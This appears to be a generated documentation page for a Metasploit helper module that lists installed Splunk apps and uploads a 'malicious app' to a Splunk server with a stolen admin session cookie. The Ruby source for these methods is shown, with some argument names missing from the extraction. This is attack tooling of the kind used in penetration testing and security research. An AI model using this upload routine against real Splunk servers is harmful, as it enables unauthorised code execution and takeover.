Module: Msf::Exploit::Remote::HTTP::Splunk::Apps
- Included in:
- Msf::Exploit::Remote::HTTP::Splunk
- Defined in:
- lib/msf/core/exploit/remote/http/splunk/apps.rb
Overview
This module provides a way of interacting with Splunk apps
Instance Method Summary collapse
-
#get_apps(cookie) ⇒ Hash
Retrieves a list of installed Splunk apps along with their status.
-
#get_random_app(cookie, filter = {}) ⇒ String?
Selects a random Splunk app from the installed apps, optionally filtered by criteria.
-
#splunk_upload_app(app_name, cookie) ⇒ Boolean
Uploads malicious app to splunk using admin cookie.
Instance Method Details
#get_apps(cookie) ⇒ Hash
Retrieves a list of installed Splunk apps along with their status
55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 |
# File 'lib/msf/core/exploit/remote/http/splunk/apps.rb', line 55 def get_apps() apps = {} vars_get = {} max_pages = 250 max_pages.times do |page_num| res = send_request_cgi( 'uri' => splunk_apps_url, 'method' => 'GET', 'cookie' => , 'vars_get' => vars_get ) unless res&.code == 200 fail_with(Msf::Module::Failure::UnexpectedReply, "#{peer} - Failed to retrieve apps (HTTP #{res&.code})") end html = res.get_html_document table = html.at('table.splTable') break unless table table.css('tr').each do |row| name_td = row.at('td.col-generic.col-2') status_td = row.at('td.col-status.col-7') next unless name_td && status_td status_link = status_td.at('a[onclick*="doObjectAction"]') action_type = status_link&.[]('onclick')&.slice(/doObjectAction\('(disable|enable)'/, 1) enabled = action_type != 'enable' name = name_td.text.strip apps[name] = { enabled: enabled } end vars_get = extract_next_page_vars(html) break unless vars_get if page_num == max_pages - 1 print_warning("Reached maximum page limit (#{max_pages}). Some apps might be missing.") end end apps end |
#get_random_app(cookie, filter = {}) ⇒ String?
Selects a random Splunk app from the installed apps, optionally filtered by criteria
106 107 108 109 110 111 |
# File 'lib/msf/core/exploit/remote/http/splunk/apps.rb', line 106 def get_random_app(, filter = {}) all_apps = get_apps() filtered_apps = filter_apps(all_apps, filter).keys filtered_apps.sample end |
#splunk_upload_app(app_name, cookie) ⇒ Boolean
Uploads malicious app to splunk using admin cookie
10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
# File 'lib/msf/core/exploit/remote/http/splunk/apps.rb', line 10 def splunk_upload_app(app_name, ) res = send_request_cgi({ 'uri' => splunk_upload_url, 'method' => 'GET', 'cookie' => }) unless res&.code == 200 vprint_error('Unable to get form state') return false end html = res.get_html_document data = Rex::MIME::Message.new # fill the hidden fields from the form: state and splunk_form_key html.at('[id="installform"]').elements.each do |form| next unless form.attributes['value'] data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"") end data.add_part('1', nil, nil, 'form-data; name="force"') data.add_part(splunk_helper_malicious_app(app_name), 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"") post_data = data.to_s res = send_request_cgi({ 'uri' => splunk_upload_url, 'method' => 'POST', 'cookie' => , 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/)) vprint_error('Error uploading App') return false end true end |